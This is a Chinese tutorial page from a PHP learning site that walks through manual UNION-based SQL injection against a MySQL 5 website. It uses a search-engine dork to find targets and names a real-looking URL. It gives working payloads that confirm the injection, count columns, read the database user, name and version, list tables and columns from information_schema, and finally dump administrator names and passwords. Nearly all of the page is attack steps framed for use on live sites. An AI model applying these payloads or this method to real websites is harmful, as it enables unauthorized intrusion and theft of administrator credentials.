网站地图    收藏   

主页 > 后端 > 网站安全 >

php手工注射MYSQL5.0注入 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 12:00 作者: 阅读:

[导读] 我们以实例来讲述PHP网站的手工注射,个人感觉图文教程比视频更加直观,而却使用示例网站讲述更加具有实战性。利用工具:google 管中窥豹使用语句:site:heib0y.com inurl:php 可以找出注...

我们以实例来讲述PHP网站的手工注射,个人感觉图文教程比视频更加直观,而却使用示例网站讲述更加具有实战性。

利用工具:google 管中窥豹
使用语句:site:heib0y.com inurl:php 可以找出注入点
首先 语句加’

http://www.2cto.com /products/shop.php?c=misc&id=8′

报错
\

and 1=1 和and 1=2  一个正常一个错误 很明显的注射点

第二步:order by 1  一直增加数直到出错加到12时错误。说明是11

\

第三步:id=8 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11–

\

页面出现数字5和8,

在5的位置使用内置函数user()爆出当前的数据库使用账户

\

分别使用database(),version()代替5的位置可以爆出数据库名和MYSQL的版本()
5.1.66-community-log

第四步:有了数据库的库名和5.0以上版本信息,我们可以快速爆出所有表名,使用的语法是

php?id=72 and 1=2 union select 1,2,3,4,group_concat(table_name) 6,7,8,9,10,11 from information_schema.tables where table_schema=0x68706F6C

0x68706F6C 这里是数据库的十六进制的编码形式,使用小葵编码一下就行

\

从中找出敏感表名如admin user admins等等,再爆出管理的字段使用的语句是

php?id=72 and 1=2 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=0x61646D696E6973747261746F72  /*此处是表名的十六进制表示*/

我们这里爆出的字段是password和name

最后一步:我们来爆出网站管理员的账号和密码这里是双暴字段方式

使用语句:

and 1=2 UNION SELECT 1,2,3,4,5,6,7,group_concat(name,0x3a,password),9,10,11 from admins

\

 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论